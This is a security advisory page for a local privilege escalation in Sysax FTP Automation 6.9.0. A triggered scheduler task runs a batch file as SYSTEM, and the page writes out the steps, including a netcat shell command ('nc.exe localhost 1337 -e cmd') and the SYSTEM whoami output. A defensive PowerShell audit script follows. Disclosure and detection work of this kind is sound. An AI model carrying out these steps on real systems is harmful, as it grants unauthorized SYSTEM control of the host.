Sysax FTP Automation 6.9.0 Privilege Escalation

2022.03.22
Credit: bzyo
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Exploit Author: bzyo (@bzyo_)
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64

# Details:
The Sysax Scheduler Service runs as Local System. By default the application lets low-privileged users create and run backup jobs (scheduled/triggered tasks), and a task can be configured to run as the current user or as another specified account. If the option to log in as a specific user is unchecked, the task is executed by the service itself, i.e. as Local System. A low-privileged user can therefore define a task that launches a program of their choosing and escalate to NT AUTHORITY\SYSTEM.

# Prerequisites:
To exploit this, an attacker must already have local access to a system running Sysax FTP Automation, using a low-privileged user account.

# Exploit:
Logged in as the low-privileged account:

1. Create the folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create the file c:\temp\pwn.bat with the contents:
       c:\temp\nc.exe localhost 1337 -e cmd
4. Open a command prompt and start a netcat listener:
       nc -nlvvp 1337
5. Run sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select "Setup Scheduled/Triggered Tasks" and add a task (Triggered):
   - Set the folder to monitor to c:\temp
   - Check "Run task if a file is added to the monitor folder or subfolder(s)"
   - Choose "Run any other Program" and select c:\temp\pwn.bat
   - Uncheck "Login as the following user to run task"
   - Finish and Save
7. Create a new text file in c:\temp (this triggers the task)
8. Check the netcat listener; the shell runs as SYSTEM:
       C:\WINDOWS\system32>whoami
       whoami
       nt authority\system
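The PowerShell script below is an added example, not code from the advisory or from Sysax. It audits a host for the two conditions the write-up depends on: a Sysax service running as Local System, and processes spawned by a Sysax binary that are themselves running as SYSTEM (the state left behind by the pwn.bat -> nc.exe -> cmd.exe chain in step 8). Assumptions not confirmed by the advisory: the install directory is the one named above, the scheduler service's name or binary path contains "Sysax", and the list of "shell-like" child images is only a heuristic.

```powershell
# Added audit/triage script (not part of the original advisory or the vendor's
# software). Checks (a) Sysax services running as Local System and (b) child
# processes of Sysax binaries running as SYSTEM.
# Assumptions: install directory as named in the advisory; the service name or
# binary path contains "Sysax". Run elevated for a complete view: a standard
# user is not allowed to query the owner of SYSTEM processes.

$InstallDir = 'C:\Program Files (x86)\SysaxAutomation'

function Get-SysaxServiceReport {
    # (a) Which Sysax-related services exist, and what account do they run as?
    Get-CimInstance Win32_Service |
        Where-Object { $_.Name -like '*Sysax*' -or $_.PathName -like "*$InstallDir*" } |
        ForEach-Object {
            $highPriv = $_.StartName -in @('LocalSystem', 'NT AUTHORITY\SYSTEM')
            [pscustomobject]@{
                Service   = $_.Name
                State     = $_.State
                StartMode = $_.StartMode
                RunsAs    = $_.StartName
                Finding   = if ($highPriv) { 'service runs as Local System; tasks it launches run as SYSTEM' } else { 'ok' }
                Binary    = $_.PathName
            }
        }
}

function Get-SysaxChildProcessReport {
    # (b) Processes whose parent image lives under the install directory.
    #     A cmd.exe / nc.exe child running as SYSTEM matches the advisory's
    #     post-exploitation state. Point-in-time only: tasks that already
    #     exited are not visible here.
    $procs     = @(Get-CimInstance Win32_Process)
    $parentIds = @($procs | Where-Object { $_.ExecutablePath -like "$InstallDir\*" } |
                  ForEach-Object { $_.ProcessId })

    foreach ($p in $procs) {
        if ($p.ParentProcessId -notin $parentIds) { continue }

        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner
        $user  = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { '<access denied>' }

        $isSystem   = $user -eq 'NT AUTHORITY\SYSTEM'
        # Heuristic list of shell-like images (assumption, extend as needed).
        $suspicious = $isSystem -and ($p.Name -in @('cmd.exe', 'powershell.exe', 'nc.exe'))

        [pscustomobject]@{
            ProcessId   = $p.ProcessId
            ParentPid   = $p.ParentProcessId
            Image       = $p.Name
            User        = $user
            Finding     = if ($suspicious) { 'shell/netcat spawned by Sysax as SYSTEM' }
                          elseif ($isSystem) { 'child of Sysax binary runs as SYSTEM' }
                          else { 'ok' }
            CommandLine = $p.CommandLine
        }
    }
}

Write-Host '== Sysax services =='
Get-SysaxServiceReport | Format-List

Write-Host '== Processes spawned by Sysax binaries =='
Get-SysaxChildProcessReport | Format-List
```

Run it from an elevated PowerShell session. A "runs as Local System" finding on a host where standard users can launch sysaxschedscp.exe is the configuration the advisory abuses; the child-process report is live triage only and complements, rather than replaces, process-creation logging (e.g. Sysmon event 1 with a parent image under the install directory and user NT AUTHORITY\SYSTEM). The page names no vendor fix, so until one is applied the practical control is to keep low-privileged accounts away from the scheduler configuration tool.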


Copyright 2024, cxsecurity.com